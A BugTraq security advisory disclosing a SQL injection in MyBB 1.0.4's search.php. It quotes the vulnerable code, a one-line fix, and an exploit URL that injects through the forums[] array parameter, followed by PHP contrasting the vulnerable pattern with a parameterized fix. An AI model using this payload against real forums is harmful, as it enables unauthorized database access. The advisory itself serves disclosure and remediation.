BugTraq
MyBB 1.0.4 New SQL Injection Mar 02 2006 06:03PM
MyBB 1.0.4 New SQL Injection

D3vil-0x1

File :- search.php

580 to 592

/* _START_ */

if($mybb->input['forums'] != "all")
{
    if(!is_array($mybb->input['forums']))    <<-- We break it by forums[]=-1
    {
        $mybb->input['forums'] = array(intval($mybb->input['forums']));
    }
    foreach($mybb->input['forums'] as $forum)
    {
        if(!$searchin[$forum])
        {
            $query = $db->query("SELECT f.fid FROM ".TABLE_PREFIX."forums f LEFT JOIN ".TABLE_PREFIX."forumpermissions p ON (f.fid=p.fid AND p.gid='".$mybb->user[usergroup]."') WHERE INSTR(CONCAT(',',parentlist,','),',$forum,') > 0 AND active!='no' AND (ISNULL(p.fid) OR p.cansearch='yes')");
            if($db->num_rows($query) == 1)
            {
                $wheresql .= " AND t.fid='$forum' ";    <<-- First SQL Injection
                $searchin[$fid] = 1;
            }

Fix it :-

Add :-

$forum = intval($forum); To Line 568

/* _END_*/

/* Exploit */

[username] = any username in the victim forum

[HOST]/[PATH]/search.php?action=do_search&postthread=1&author=[username]&matchusername=1&forums[]=-1'
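The root cause is that intval() runs only on the scalar branch, so an array element such as forums[]=-1' reaches both the INSTR(...) query and the t.fid='$forum' clause untouched. The following is an added example, not code from the advisory or from MyBB, showing the vulnerable pattern next to a hardened version; $forums stands in for $mybb->input['forums'] and the "fid > 0" rule is an assumption about MyBB forum ids.

```php
<?php
// Vulnerable shape from search.php: the cast happens only when the
// parameter arrived as a scalar, so array elements are interpolated raw.
function build_where_vulnerable($forums): string
{
    if (!is_array($forums)) {
        $forums = array(intval($forums));
    }
    $wheresql = '';
    foreach ($forums as $forum) {
        $wheresql .= " AND t.fid='$forum' ";
    }
    return $wheresql;
}

// Hardened: cast every element no matter which branch the request took,
// skip nested arrays (intval() on an array silently returns 0 or 1),
// and keep only positive ids (assumption: MyBB fids are >= 1).
function normalize_forum_ids($forums): array
{
    if (!is_array($forums)) {
        $forums = array($forums);
    }
    $ids = array();
    foreach ($forums as $forum) {
        if (is_array($forum)) {
            continue;
        }
        $id = intval($forum);
        if ($id > 0) {
            $ids[] = $id;
        }
    }
    return array_values(array_unique($ids));
}

// Bind the ids as placeholders instead of interpolating them into the SQL.
function build_where_hardened($forums): array
{
    $ids = normalize_forum_ids($forums);
    if (!$ids) {
        return array('', array());
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    return array(" AND t.fid IN ($placeholders) ", $ids);
}

// Constructed input mirroring the advisory's forums[]=-1' payload.
echo build_where_vulnerable(array("-1'")), "\n";          // the quote survives into the SQL
list($sql, $params) = build_where_hardened(array("-1'", "3", "3", "7abc"));
echo $sql, ' bound to ', implode(',', $params), "\n";     // only integer ids remain, as parameters
```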

Copyright 2010, SecurityFocus